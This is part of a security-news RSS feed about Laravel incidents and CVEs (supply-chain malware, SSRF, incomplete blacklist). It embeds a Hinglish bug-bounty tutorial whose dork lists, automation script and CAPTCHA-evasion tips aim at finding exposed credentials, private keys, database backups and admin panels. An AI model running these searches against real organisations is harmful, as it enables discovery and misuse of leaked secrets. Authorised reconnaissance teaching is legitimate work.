<p>The post <a href="https://gbhackers.com/laravel-crlf-injection-flaw/">Laravel CRLF Injection Flaw Could Disrupt Outbound Email Handling</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[North Korean Chollima Group Abuses Packagist Package to Infect PHP Developers]]></title>
<description><![CDATA[Security researchers discovered obfuscated JavaScript hidden inside a Packagist development version of the legitimate Laravel package roberts/leads. The malicious code was appended to tailwind.js in the dev branch, drewroberts/feature/test-case. It was exposed as an installable dev version on Pac...]]></description>
<link>https://tsecurity.de/de/3565200/it-security-nachrichten/north-korean-chollima-group-abuses-packagist-package-to-infect-php-developers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565200/it-security-nachrichten/north-korean-chollima-group-abuses-packagist-package-to-infect-php-developers/</guid>
<pubDate>Tue, 02 Jun 2026 09:22:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security researchers discovered obfuscated JavaScript hidden inside a Packagist development version of the legitimate Laravel package roberts/leads. The malicious code was appended to tailwind.js in the dev branch, drewroberts/feature/test-case. It was exposed as an installable dev version on Packagist. Socket’s AI scanner flagged the version after detecting runtime reconstruction of Node.js internals and immediate execution […]</p>
<p>The post <a href="https://cyberpress.org/chollima-targets-php-developers/">North Korean Chollima Group Abuses Packagist Package to Infect PHP Developers</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] Laravel: Schwachstelle ermöglicht Manipulation von Daten]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Laravel ausnutzen, um Daten zu manipulieren.]]></description>
<link>https://tsecurity.de/de/3562731/it-security-nachrichten/neu-hoch-laravel-schwachstelle-ermoeglicht-manipulation-von-daten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562731/it-security-nachrichten/neu-hoch-laravel-schwachstelle-ermoeglicht-manipulation-von-daten/</guid>
<pubDate>Mon, 01 Jun 2026 12:51:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Laravel ausnutzen, um Daten zu manipulieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Dorks Google Ko Bana Do Apna Hacking Tool: Free Mein Bugs Dhundho! (Hinglish Mein)]]></title>
<description><![CDATA[Series: Bug Bounty Zero se Hero 🦸 | Article #11By HackerMD | 17 min readAaj Kya Seekhenge?Google Dorks kya hai bilkul basics seKaise kaam karta hai Google index ki powerSabhi operators ek ek deeplyBug bounty ke liye best dorksSensitive files, admin panels, exposed configsGHDB Google Hacking Datab...]]></description>
<link>https://tsecurity.de/de/3562110/hacking/google-dorks-google-ko-bana-do-apna-hacking-tool-free-mein-bugs-dhundho-hinglish-mein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562110/hacking/google-dorks-google-ko-bana-do-apna-hacking-tool-free-mein-bugs-dhundho-hinglish-mein/</guid>
<pubDate>Mon, 01 Jun 2026 08:36:30 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0ivybu1VcizZVPoP3wvhEQ.png"></figure><p><strong>Series: Bug Bounty Zero se Hero 🦸 | Article #11</strong><br><em>By HackerMD | 17 min read</em></p><h3>Aaj Kya Seekhenge?</h3><ul><li>Google Dorks kya hai bilkul basics se</li><li>Kaise kaam karta hai Google index ki power</li><li>Sabhi operators ek ek deeply</li><li>Bug bounty ke liye best dorks</li><li>Sensitive files, admin panels, exposed configs</li><li>GHDB Google Hacking Database</li><li>Elite automated dorking workflow</li></ul><p><strong>Kyun zaroori hai?</strong> Shodan aur Censys ke liye API key chahiye <strong>Google Dorks bilkul FREE hai!</strong> Aur Google itna powerful crawler hai ki usne woh cheezein index kar rakhi hain jo companies <strong>kabhi public nahi karna chahti thin!</strong> Exposed config files, database backups, passwords sab Google pe mil jaata hai!</p><h3>Google Dorks Kya Hai? Simple Analogy</h3><p>Normal Google search:</p><pre>"best restaurants in Mumbai"<br>→ Restaurant websites milti hain</pre><p>Google Dork:</p><pre>site:company.com filetype:sql<br>→ Company ka database backup publicly accessible! 😱<br><br>site:company.com inurl:admin intitle:"Login"<br>→ Admin panel Google mein indexed! 🎯<br><br>site:company.com ext:env "DB_PASSWORD"<br>→ .env file mein password exposed! 🔴</pre><p><strong>Dork = Specially crafted Google search query jo sensitive information expose karta hai!</strong></p><h3>Yeh Kaise Possible Hai?</h3><p>Samjho ek story se:</p><p>Ek developer ne config.php file accidentally <strong>public folder</strong> mein upload kar di usme database password tha।</p><p>Developer ko pata bhi nahi chala।</p><p><strong>Google ka crawler aaya → File index ho gayi → 3 din baad Google pe searchable!</strong></p><p>Tum dork lagate ho:</p><pre>site:company.com filetype:php "db_password"</pre><p><strong>Result: Database password seedha Google search mein!</strong> 🔴</p><p>Yahi Google Dorks ka power hai <strong>Google ne pehle se kar rakha hai kaam!</strong></p><h3>PART 1: Core Operators Sab Samjho</h3><h3>Operator 1: site: Domain Pe Focus Karo</h3><pre>site:example.com<br>→ Sirf example.com ke pages<br><br>site:example.com login<br>→ example.com pe login pages<br><br>site:*.example.com<br>→ Sabhi subdomains ke pages<br><br># Bug bounty use:<br>site:target.com<br># Pehle dekho kitne pages indexed hain<br># Interesting patterns dhundho</pre><h3>Operator 2: inurl: URL Mein Kya Hai?</h3><pre>inurl:admin<br>→ URL mein "admin" wale pages</pre><pre>inurl:login site:target.com<br>→ target.com ke login pages</pre><pre>inurl:dashboard site:target.com<br>→ Dashboards!</pre><pre>inurl:api/v1 site:target.com<br>→ API endpoints!</pre><pre>inurl:.php?id= site:target.com<br>→ Possible SQL injection points! 🎯</pre><h3>Operator 3: intitle: Page Title Mein Kya Hai?</h3><pre>intitle:"Admin Panel" site:target.com<br>intitle:"phpMyAdmin" site:target.com<br>intitle:"Dashboard" site:target.com<br>intitle:"Index of" site:target.com<br>→ Directory listing exposed! 🎯<br><br>intitle:"Grafana" site:target.com<br>intitle:"Jenkins" site:target.com</pre><h3>Operator 4: filetype: / ext: File Type Filter</h3><pre>filetype:pdf site:target.com<br>→ PDF documents — internal docs?<br><br>filetype:sql site:target.com<br>→ Database backup files! 🔴<br><br>filetype:log site:target.com<br>→ Log files — usernames, errors!<br><br>ext:env site:target.com<br>→ .env files — passwords! 🔴<br><br>ext:xml site:target.com<br>→ XML config files<br><br>ext:bak site:target.com<br>→ Backup files! 🎯<br><br>ext:conf site:target.com<br>→ Config files!<br><br>ext:txt site:target.com<br>→ Text files — sometimes sensitive<br><br>ext:json site:target.com "api_key"<br>→ JSON mein API keys! 🔴</pre><h3>Operator 5: intext: Page Content Mein Dhundho</h3><pre>intext:"password" filetype:log site:target.com<br>→ Log file mein password!<br><br>intext:"api_key" site:target.com<br>→ Page mein API key exposed!<br><br>intext:"DB_PASSWORD" site:target.com<br>→ Database password in page content!<br><br>intext:"BEGIN RSA PRIVATE KEY" site:target.com<br>→ Private key exposed! 🔴 Critical!</pre><h3>Operator 6: allinurl: aur allintitle:</h3><pre>allinurl:admin login panel<br>→ URL mein teeno words honge<br><br>allintitle:admin login dashboard site:target.com<br>→ Title mein teeno words</pre><h3>Operator 7: -Exclude Karo</h3><pre>site:target.com -www<br>→ www chhod ke baaki subdomains<br><br>site:target.com filetype:php -inurl:index<br>→ Index.php chhod ke baaki PHP files</pre><h3>Operator 8: "Exact Match</h3><pre>"Index of /backup" site:target.com<br>→ Exact string match — backup directory!<br><br>"ORA-01756" site:target.com<br>→ Oracle SQL error — SQL injection clue!<br><br>"Warning: mysql_fetch" site:target.com<br>→ MySQL error — database info leak!</pre><h3>Operator 9: OR Multiple Options</h3><pre>site:target.com (ext:env OR ext:cfg OR ext:conf)<br>→ Koi bhi config file!<br><br>(inurl:admin OR inurl:administrator OR inurl:panel) site:target.com</pre><h3>Operator 10: * Wildcard</h3><pre>site:*.target.com<br>→ Sabhi subdomains!<br><br>"api_key = *" site:target.com<br>→ API key pattern dhundho</pre><h3>PART 2: Bug Bounty Ke Liye Best Dorks Category Wise</h3><h3>Category 1: Exposed Sensitive Files</h3><pre># Environment files — GOLDMINE!<br>site:target.com ext:env<br>site:target.com "DB_PASSWORD"<br>site:target.com "APP_SECRET"<br>site:target.com ".env" "DB_HOST"<br><br># Config files<br>site:target.com ext:conf "password"<br>site:target.com ext:cfg "password"<br>site:target.com filetype:xml "password"<br>site:target.com ext:ini "password"<br><br># Database files<br>site:target.com ext:sql<br>site:target.com ext:sql.gz<br>site:target.com ext:db<br>site:target.com ext:sqlite<br>site:target.com "mysqldump" filetype:sql<br><br># Backup files<br>site:target.com ext:bak<br>site:target.com ext:backup<br>site:target.com "backup" filetype:zip<br>site:target.com ext:old</pre><h3>Category 2: Admin Panels + Login Pages</h3><pre>site:target.com intitle:"Admin"<br>site:target.com inurl:admin/login<br>site:target.com inurl:administrator<br>site:target.com inurl:wp-admin<br>site:target.com inurl:cpanel<br>site:target.com inurl:webadmin<br>site:target.com intitle:"Control Panel"<br>site:target.com inurl:manage<br>site:target.com inurl:moderator<br>site:target.com intitle:"Dashboard" inurl:admin</pre><h3>Category 3: Exposed Development Environments</h3><pre>site:target.com inurl:dev<br>site:target.com inurl:staging<br>site:target.com inurl:test<br>site:target.com intitle:"Development"<br>site:target.com "debug=true"<br>site:target.com "APP_DEBUG=true"<br>site:target.com inurl:localhost<br>site:target.com "TODO" filetype:php<br>site:target.com "FIXME" filetype:php</pre><h3>Category 4: API Keys + Credentials</h3><pre>site:target.com "api_key"<br>site:target.com "apikey"<br>site:target.com "api_secret"<br>site:target.com "client_secret"<br>site:target.com "access_token"<br>site:target.com "Authorization: Bearer"<br>site:target.com "AWS_SECRET_ACCESS_KEY"<br>site:target.com "GITHUB_TOKEN"<br>site:target.com "private_key"<br>site:target.com "BEGIN RSA PRIVATE KEY"</pre><h3>Category 5: Directory Listing Exposed!</h3><pre>intitle:"Index of" site:target.com<br>intitle:"Index of /" site:target.com<br>intitle:"Directory Listing" site:target.com<br>intitle:"Index of /backup" site:target.com<br>intitle:"Index of /uploads" site:target.com<br>intitle:"Index of /admin" site:target.com<br>intitle:"Index of /logs" site:target.com</pre><blockquote><em>🎯 </em><strong><em>Directory Listing = Files seedha download!</em></strong><em> Backup files, logs, user uploads sab accessible!</em></blockquote><h3>Category 6: Error Messages Information Disclosure</h3><pre>site:target.com "SQL syntax"<br>site:target.com "ORA-01756"<br>site:target.com "Warning: mysql"<br>site:target.com "Fatal error" filetype:php<br>site:target.com "Uncaught exception"<br>site:target.com "Stack trace"<br>site:target.com "at Object.&lt;anonymous&gt;"<br>site:target.com "server error" "500"</pre><blockquote><em>💡 </em><strong><em>Errors = Information Leak!</em></strong><em> Database type, file paths, version numbers sab error messages mein hota hai!</em></blockquote><h3>Category 7: Specific Technologies</h3><pre># WordPress<br>site:target.com inurl:wp-content<br>site:target.com inurl:wp-login<br>site:target.com "wp-config.php"<br><br># Laravel<br>site:target.com "APP_KEY" ext:env<br><br># phpMyAdmin<br>site:target.com intitle:"phpMyAdmin"<br><br># Jenkins<br>site:target.com intitle:"Jenkins" inurl:jenkins<br><br># Jira<br>site:target.com intitle:"Jira" inurl:jira<br><br># Swagger API Docs<br>site:target.com inurl:swagger<br>site:target.com intitle:"Swagger UI"<br>site:target.com inurl:api-docs<br><br># Kibana<br>site:target.com intitle:"Kibana" port:5601</pre><h3>Category 8: Login Bypasses</h3><pre>site:target.com inurl:"redirect="<br>site:target.com inurl:"next="<br>site:target.com inurl:"url="<br>site:target.com inurl:"returnUrl="<br>→ Yeh sab Open Redirect candidates! 🎯<br><br>site:target.com inurl:"?debug=1"<br>site:target.com inurl:"?test=1"<br>→ Debug mode parameters!</pre><h3>PART 3: GHDB Google Hacking Database</h3><p><strong>GHDB = Google Hacking Database </strong>hackers ka community-maintained dorks collection!</p><pre>URL: https://www.exploit-db.com/google-hacking-database<br><br>Yahan milega:<br>→ 10,000+ ready-made dorks<br>→ Category wise sorted<br>→ Regular updates<br>→ Severity level bhi batata hai<br><br>Categories:<br>├── Footholds<br>├── Files containing passwords<br>├── Sensitive directories<br>├── Web server detection<br>├── Vulnerable files<br>├── Vulnerable servers<br>├── Error messages<br>├── Files containing usernames<br>└── Sensitive online shopping info</pre><p><strong>Use kaise karo:</strong></p><pre>1. exploit-db.com/google-hacking-database kholo<br>2. Category choose karo<br>3. Ready dork copy karo<br>4. site:target.com add karo<br>5. Google pe search karo!</pre><h3>PART 4: Automated Dorking Elite Technique</h3><h3>Tool 1: dorkscout</h3><pre># Install karo<br>pip3 install dorkscout<br><br># Basic use<br>dorkscout -t example.com<br><br># Custom dorks file ke saath<br>dorkscout -t example.com -d my_dorks.txt</pre><h3>Tool 2: Pagodo GHDB Automated</h3><pre># Install karo<br>git clone https://github.com/opsdisk/pagodo.git<br>cd pagodo<br>pip3 install -r requirements.txt<br><br># GHDB dorks download karo<br>python3 ghdb_scraper.py -j -s<br><br># Automated dorking karo<br>python3 pagodo.py \<br>  -d example.com \<br>  -g dorks.txt \<br>  -l 50 \<br>  -s 30 \<br>  -e</pre><h3>Tool 3: Manual Elite Script</h3><pre>#!/bin/bash<br># google_dork_elite.sh<br><br>TARGET=$1<br>echo "🔍 Google Dorking: $TARGET"<br>echo "══════════════════════════"<br><br># Auto-open browser ke saath dorks<br>DORKS=(<br>  "site:$TARGET ext:env"<br>  "site:$TARGET ext:sql"<br>  "site:$TARGET intitle:\"Index of\""<br>  "site:$TARGET inurl:admin"<br>  "site:$TARGET \"api_key\""<br>  "site:$TARGET ext:bak"<br>  "site:$TARGET inurl:swagger"<br>  "site:$TARGET filetype:log"<br>  "site:$TARGET \"DB_PASSWORD\""<br>  "site:$TARGET inurl:phpinfo.php"<br>)<br><br>for dork in "${DORKS[@]}"; do<br>  ENCODED=$(python3 -c \<br>    "import urllib.parse; \<br>     print(urllib.parse.quote('$dork'))")<br>  echo "🎯 Dork: $dork"<br>  echo "🔗 URL: https://www.google.com/search?q=$ENCODED"<br>  echo "──────────────────────────────"<br>  sleep 2  # Rate limit avoid karo<br>done</pre><h3>PART 5: GitHub Dorking BONUS Elite Technique!</h3><p><strong>GitHub pe bhi dorking hoti hai aur wahan toh sach mein gems milti hain!</strong></p><pre># GitHub Search mein:<br><br># API Keys<br>org:targetcompany "api_key"<br>org:targetcompany "apikey"<br>org:targetcompany "secret_key"<br># Passwords<br>org:targetcompany "password" filename:.env<br>org:targetcompany "DB_PASSWORD"<br># AWS Keys<br>org:targetcompany "AWS_SECRET_ACCESS_KEY"<br>org:targetcompany "AKIA" (AWS Access Key prefix!)<br># Private keys<br>org:targetcompany "BEGIN RSA PRIVATE KEY"<br>org:targetcompany "BEGIN DSA PRIVATE KEY"<br># Config files<br>org:targetcompany filename:config.php "password"<br>org:targetcompany filename:.htpasswd<br>org:targetcompany filename:id_rsa<br># Internal URLs<br>org:targetcompany "internal.company.com"<br>org:targetcompany "staging"<br>org:targetcompany "dev.company.com"</pre><blockquote><em>🤑 </em><strong><em>GitHub Dorking = Highest ROI!</em></strong><em> Developers accidentally push karte hain secrets phir delete karte hain </em><strong><em>lekin git history mein rehta hai!</em></strong></blockquote><h3>GitHub Dorking Tool GitDorker</h3><pre># Install karo<br>git clone https://github.com/obheda12/GitDorker<br>cd GitDorker<br>pip3 install -r requirements.txt<br><br># Run karo<br>python3 GitDorker.py \<br>  -tf ~/.github_token \<br>  -q targetcompany \<br>  -d dorks/medium_dorks.txt</pre><h3>PART 6: Dorks Quick Reference Cheat Sheet</h3><pre># ─── OPERATORS ────────────────────────────<br>site:          → Domain limit karo<br>inurl:         → URL mein text<br>intitle:       → Title mein text<br>intext:        → Content mein text<br>filetype:/ext: → File type<br>allinurl:      → URL mein sab words<br>"exact phrase" → Exact match<br>-word          → Exclude<br>OR             → Multiple options<br>*              → Wildcard<br># ─── TOP BUG BOUNTY DORKS ─────────────────<br>site:T ext:env<br>site:T ext:sql<br>site:T intitle:"Index of"<br>site:T inurl:admin<br>site:T "api_key"<br>site:T ext:bak<br>site:T inurl:swagger<br>site:T "DB_PASSWORD"<br>site:T "BEGIN RSA PRIVATE KEY"<br>site:T inurl:phpinfo.php<br>site:T inurl:.git<br>site:T "debug=true"<br>site:T inurl:staging<br>site:T filetype:log "password"<br>site:T intext:"sql syntax error"</pre><p><em>(T = target domain)</em></p><h3>Important: Google Anti-Bot Se Kaise Bachein</h3><pre>❌ Problem: Bahut fast queries → Google CAPTCHA!<br><br>✅ Solution:<br>1. Queries ke beech 30-60 second wait karo<br>2. Google account se login karke use karo<br>3. VPN change karo agar block ho<br>4. Bing Dorks bhi try karo (less restrictive!)<br>5. Automated tools mein delay parameter use karo<br>Bing Version:<br>site:example.com filetype:sql<br>(Google jaisa kaam karta hai Bing pe bhi!)</pre><h3>Aaj Ka Homework</h3><pre>1. exploitdb.com/google-hacking-database kholo<br>2. "Files containing passwords" category dekho<br>3. Top 5 dorks copy karo<br>4. site:hackerone.com laga ke Google pe test karo<br>5. Kya koi interesting result mila?<br><br>Bonus:<br>6. GitHub pe search karo:<br>   org:google "api_key" filename:.env<br>   (Publicly accessible repos mein kya hai?)<br>7. Apna custom dork banao - comment mein share karo!</pre><h3>Quick Revision</h3><pre>🔍 Google Dorks = Special search queries<br>                  sensitive info expose karti hain<br>📚 GHDB         = 10,000+ ready-made dorks<br>🗂️ Best Dorks   = ext:env, ext:sql, "Index of",<br>                  "api_key", "DB_PASSWORD"<br>🐙 GitHub Dorks = Source code mein secrets dhundho<br>⚠️ Rate Limit   = Slow down — CAPTCHA se bachna<br>🔑 Key Insight  = Google ne index kar rakha hai —<br>                  tum sirf query likhte ho!<br>💰 Bug Types    = Config exposure, API key leak,<br>                  Admin panels, Directory listing,<br>                  Database backups</pre><h3>Meri Baat…</h3><p>Ek din maine ek bug bounty program pe simple dork lagaya:</p><pre>site:targetcompany.com ext:env</pre><p><strong>Pehla result:</strong></p><pre>https://targetcompany.com/backend/.env<br><br>Content:<br>APP_NAME=TargetApp<br>APP_ENV=production<br>APP_KEY=base64:xxxxxxxxxxx<br>DB_CONNECTION=mysql<br>DB_HOST=db.internal.targetcompany.com<br>DB_PORT=3306<br>DB_DATABASE=production_db<br>DB_USERNAME=root<br>DB_PASSWORD=SuperSecret123!<br>STRIPE_SECRET=sk_live_xxxxxxxxxxxxxxxxxx<br>AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxx</pre><p><strong>Poori company ki production credentials</strong><strong>.env file publicly accessible!</strong></p><p>Stripe live key, AWS secret key, database root password sab kuch ek file mein।</p><p><strong>Bounty: $5,000 Critical!</strong> 🎉</p><p>Google pe 30 second mein mila koi tool install nahi, koi scan nahi!</p><p><strong>Lesson: Sabse powerful tool kabhi kabhi sirf ek Google search hota hai!</strong></p><p>Agle article mein <strong>Waybackurls + GAU </strong>Internet Archive se purane hidden endpoints nikalo jo developers sochte hain “delete” ho gaye lekin actually abhi bhi exist karte hain! 🔥</p><p><strong><em>HackerMD </em></strong><em>Bug Bounty Hunter | Cybersecurity Researcher</em><br><em>GitHub: </em><a href="https://github.com/BotGJ16"><em>BotGJ16</em></a><em> | Medium: </em><a href="https://medium.com/@HackerMD"><em>@HackerMD</em></a></p><p><em>Previous: </em><a href="https://medium.com/@HackerMD"><em>Article #10 Shodan + Censys</em></a><br><em>Next: Article #12 Waybackurls + GAU: Purane Endpoints Se Bugs Nikalo!</em></p><p><em>#GoogleDorks #GHDB #BugBounty #Recon #EthicalHacking #Hinglish #PassiveRecon #GitHubDorking #HackerMD</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=287c3a7ffc75" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/google-dorks-google-ko-bana-do-apna-hacking-tool-free-mein-bugs-dhundho-hinglish-mein-287c3a7ffc75">Google Dorks Google Ko Bana Do Apna Hacking Tool: Free Mein Bugs Dhundho! (Hinglish Mein)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-48557 | spatie laravel-medialibrary up to 11.22.x Configuration defaultSanitizer incomplete blacklist (EUVD-2026-33439)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in spatie laravel-medialibrary up to 11.22.x. This impacts the function FileAdder::defaultSanitizer of the component Configuration Handler. This manipulation causes incomplete blacklist.

This vulnerability is tracked as CVE-2026-48557. The at...]]></description>
<link>https://tsecurity.de/de/3558532/sicherheitsluecken/cve-2026-48557-spatie-laravel-medialibrary-up-to-1122x-configuration-defaultsanitizer-incomplete-blacklist-euvd-2026-33439/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558532/sicherheitsluecken/cve-2026-48557-spatie-laravel-medialibrary-up-to-1122x-configuration-defaultsanitizer-incomplete-blacklist-euvd-2026-33439/</guid>
<pubDate>Sat, 30 May 2026 08:35:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/spatie:laravel-medialibrary">spatie laravel-medialibrary up to 11.22.x</a>. This impacts the function <code>FileAdder::defaultSanitizer</code> of the component <em>Configuration Handler</em>. This manipulation causes incomplete blacklist.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-48557">CVE-2026-48557</a>. The attack is possible to be carried out remotely. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-48555 | spatie laravel-medialibrary up to 11.22.x HTTP Request InteractsWithMedia.php addMediaFromUrl server-side request forgery (EUVD-2026-33418)]]></title>
<description><![CDATA[A vulnerability was found in spatie laravel-medialibrary up to 11.22.x. It has been rated as critical. Affected by this vulnerability is the function addMediaFromUrl of the file InteractsWithMedia.php of the component HTTP Request Handler. The manipulation leads to server-side request forgery.

T...]]></description>
<link>https://tsecurity.de/de/3558233/sicherheitsluecken/cve-2026-48555-spatie-laravel-medialibrary-up-to-1122x-http-request-interactswithmediaphp-addmediafromurl-server-side-request-forgery-euvd-2026-33418/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558233/sicherheitsluecken/cve-2026-48555-spatie-laravel-medialibrary-up-to-1122x-http-request-interactswithmediaphp-addmediafromurl-server-side-request-forgery-euvd-2026-33418/</guid>
<pubDate>Sat, 30 May 2026 04:36:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/spatie:laravel-medialibrary">spatie laravel-medialibrary up to 11.22.x</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is the function <code>addMediaFromUrl</code> of the file <em>InteractsWithMedia.php</em> of the component <em>HTTP Request Handler</em>. The manipulation leads to server-side request forgery.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-48555">CVE-2026-48555</a>. The attack is possible to be carried out remotely. No exploit exists.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Malware Found in Laravel-Lang Composer Packages After Git Tag Poisoning Attack]]></title>
<description><![CDATA[Attackers have poisoned four Laravel-Lang Composer packages by rewriting hundreds of Git tags, putting many Laravel apps at risk. Hackers compromised four popular Laravel-Lang Composer packages and injected malware by rewriting more than 700 Git tags tied to historical versions.…
Read more →
The ...]]></description>
<link>https://tsecurity.de/de/3547987/it-security-nachrichten/malware-found-in-laravel-lang-composer-packages-after-git-tag-poisoning-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547987/it-security-nachrichten/malware-found-in-laravel-lang-composer-packages-after-git-tag-poisoning-attack/</guid>
<pubDate>Tue, 26 May 2026 14:36:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Attackers have poisoned four Laravel-Lang Composer packages by rewriting hundreds of Git tags, putting many Laravel apps at risk. Hackers compromised four popular Laravel-Lang Composer packages and injected malware by rewriting more than 700 Git tags tied to historical versions.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/malware-found-in-laravel-lang-composer-packages-after-git-tag-poisoning-attack/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/malware-found-in-laravel-lang-composer-packages-after-git-tag-poisoning-attack/">Malware Found in Laravel-Lang Composer Packages After Git Tag Poisoning Attack</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malware Found in Laravel-Lang Composer Packages After Git Tag Poisoning Attack]]></title>
<description><![CDATA[Attackers have poisoned four Laravel-Lang Composer packages by rewriting hundreds of Git tags, putting many Laravel apps at risk. Hackers compromised four popular Laravel-Lang Composer packages and injected malware by rewriting more than 700 Git tags tied to historical versions. Laravel-Lang is a...]]></description>
<link>https://tsecurity.de/de/3547945/it-security-nachrichten/malware-found-in-laravel-lang-composer-packages-after-git-tag-poisoning-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547945/it-security-nachrichten/malware-found-in-laravel-lang-composer-packages-after-git-tag-poisoning-attack/</guid>
<pubDate>Tue, 26 May 2026 14:22:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Attackers have poisoned four Laravel-Lang Composer packages by rewriting hundreds of Git tags, putting many Laravel apps at risk. Hackers compromised four popular Laravel-Lang Composer packages and injected malware by rewriting more than 700 Git tags tied to historical versions. Laravel-Lang is a community-driven project that provides translation and localization files for Laravel applications. The […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Lang: Malware in populäre PHP-Pakete eingeschleust]]></title>
<description><![CDATA[Wer seine PHP-Anwendung mit Laravel Lang lokalisiert hat, könnte sich Malware eingefangen haben, die es vor allem auf Zugangsdaten abgesehen hat. (Malware, PHP)]]></description>
<link>https://tsecurity.de/de/3547729/it-nachrichten/laravel-lang-malware-in-populaere-php-pakete-eingeschleust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547729/it-nachrichten/laravel-lang-malware-in-populaere-php-pakete-eingeschleust/</guid>
<pubDate>Tue, 26 May 2026 13:17:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer seine PHP-Anwendung mit Laravel Lang lokalisiert hat, könnte sich Malware eingefangen haben, die es vor allem auf Zugangsdaten abgesehen hat. (<a href="https://www.golem.de/specials/malware/">Malware</a>, <a href="https://www.golem.de/specials/php/">PHP</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=209036&amp;page=1&amp;ts=1779794102" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel-Lang Packages Poisoned for Malware Delivery]]></title>
<description><![CDATA[Published within a 15-minute window, the malicious tags introduced backdoors to exfiltrate CI secrets. The post Laravel-Lang Packages Poisoned for Malware Delivery appeared first on SecurityWeek. This article has been indexed from SecurityWeek Read the original article: Laravel-Lang Packages Pois...]]></description>
<link>https://tsecurity.de/de/3545416/it-security-nachrichten/laravel-lang-packages-poisoned-for-malware-delivery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545416/it-security-nachrichten/laravel-lang-packages-poisoned-for-malware-delivery/</guid>
<pubDate>Mon, 25 May 2026 13:04:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Published within a 15-minute window, the malicious tags introduced backdoors to exfiltrate CI secrets. The post Laravel-Lang Packages Poisoned for Malware Delivery appeared first on SecurityWeek. This article has been indexed from SecurityWeek Read the original article: Laravel-Lang Packages Poisoned…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/laravel-lang-packages-poisoned-for-malware-delivery/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/laravel-lang-packages-poisoned-for-malware-delivery/">Laravel-Lang Packages Poisoned for Malware Delivery</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel-Lang Packages Poisoned for Malware Delivery]]></title>
<description><![CDATA[Published within a 15-minute window, the malicious tags introduced backdoors to exfiltrate CI secrets.
The post Laravel-Lang Packages Poisoned for Malware Delivery appeared first on SecurityWeek.]]></description>
<link>https://tsecurity.de/de/3545392/it-security-nachrichten/laravel-lang-packages-poisoned-for-malware-delivery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545392/it-security-nachrichten/laravel-lang-packages-poisoned-for-malware-delivery/</guid>
<pubDate>Mon, 25 May 2026 12:51:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Published within a 15-minute window, the malicious tags introduced backdoors to exfiltrate CI secrets.</p>
<p>The post <a href="https://www.securityweek.com/laravel-lang-packages-poisoned-for-malware-delivery/">Laravel-Lang Packages Poisoned for Malware Delivery</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
